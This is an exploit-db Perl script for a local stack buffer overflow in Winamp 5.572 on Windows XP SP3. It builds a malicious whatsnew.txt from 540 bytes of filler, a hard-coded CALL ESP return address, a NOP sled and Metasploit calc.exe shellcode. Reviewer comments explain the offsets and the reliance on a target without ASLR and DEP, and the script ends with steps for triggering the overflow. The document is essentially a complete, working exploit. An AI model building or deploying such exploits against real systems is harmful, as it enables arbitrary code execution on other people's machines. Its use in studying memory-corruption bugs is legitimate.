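# Exploit Title: Winamp 5.572 local buffer overflow
# Date: 25-01-2010
# Author: NeoCortex - PoC by Debug http://www.exploit-db.com/exploits/11248
# Software Link: http://www.exploit-db.com/application/11248
# Version: 5.572
# Tested on: WinXP SP3 De
#!/usr/bin/perl
#
# Still learning, having some fun...
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz to Debug, even if I don't know you. Nice find man.
# Exploit has something around 70% chance of success.
#
# What this script does: it writes a crafted whatsnew.txt to the current
# directory.  When Winamp 5.572 renders that file via
# [About Winamp] -> [Version History], the oversized content overflows a
# stack buffer, overwrites the saved return address with a CALL ESP
# gadget, and execution lands in the NOP sled followed by the shellcode.
#
# NOTE(review): the return address is a hard-coded absolute address inside
# nde.dll and the payload executes from the stack.  Both presume a target
# without ASLR and DEP (consistent with the WinXP SP3 test platform); on a
# system with either enabled this is expected to fail or only crash Winamp.
# The offset (540 bytes of filler) and the address are specific to the
# 5.572 build named in the header.

use strict;
use warnings;

print "\n#########################################\n";
print "# Winamp 5.572 stack buffer overflow #\n";
print "# PoC by: Debug (eldadru\@gmail.com) #\n";
print "# Exploit by: NeoCortex (ICQ 158005940) #\n";
print "#########################################\n";
print " __ __________________\n";
print " ________ / \\ / / ____ / ____ / ________\n";
print " ________ /_______/ / /\\ \\ / / /___/ / / / / /_______/ ________ \n";
print " /_______/ _______ / / \\ \\ / / /_____/ / / / ________ /_______/\n";
print " /_______/ / / \\ \\/ / /_____/ /___/ / /_______/\n";
print " /_/ \\__/_______/_______/\n";
print " Where's the next phone box to the matrix please?\n\n\n";

# Leading text of the file.  "Winamp 5.572" is 12 bytes, so the EIP
# overwrite below lands at file offset 12 + 540 = 552.
my $version = "Winamp 5.572";

# Filler up to the saved return address (author-determined offset).
my $junk = "\x41" x 540;

# Overwrites EIP with 0x070E86AD: FFD4 = CALL ESP inside nde.dll (Winamp
# 5.572).  Little-endian byte order, hence the reversed byte sequence.
my $eip = "\xad\x86\x0e\x07";

# NOP sled: CALL ESP lands near here, and the sled absorbs variation in
# exactly where ESP points; the author's ~70% success figure presumably
# reflects that variance.
my $nop = "\x90" x 100;

# Payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
# (Most bytes are printable, which looks like an alphanumeric-encoded
# payload with a small decoder stub in front; not verified here.)
my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47" .
    "\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32" .
    "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a" .
    "\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e" .
    "\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54" .
    "\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64" .
    "\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f" .
    "\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f" .
    "\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d" .
    "\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44" .
    "\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35" .
    "\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a" .
    "\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b" .
    "\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57" .
    "\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b" .
    "\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63" .
    "\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59" .
    "\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73" .
    "\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63" .
    "\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33" .
    "\x30\x47";

my $outfile = 'whatsnew.txt';

# Truncate ('>') rather than append ('>>'): the file must hold exactly one
# copy of the payload, because the EIP overwrite only works at its fixed
# offset.  The original appended, so a second run prefixed a stale copy and
# shifted every offset.  Three-arg open with a lexical handle, and the
# failure is reported instead of silently producing nothing.
open my $fh, '>', $outfile or die "open $outfile: $!";

# The payload is raw bytes.  Without binmode a Windows Perl would rewrite
# any 0x0A as 0x0D 0x0A, corrupting offsets and code.
binmode $fh;

print {$fh} $version . $junk . $eip . $nop . $shellcode;

# Buffered write errors (e.g. disk full) only surface at close.
close $fh or die "close $outfile: $!";

print "[+] whatsnew.txt written.\n";
print "[ ] Now copy it to your winamp folder...\n";
print "[ ] Run winamp and hit [About Winamp]->[Version History]\n";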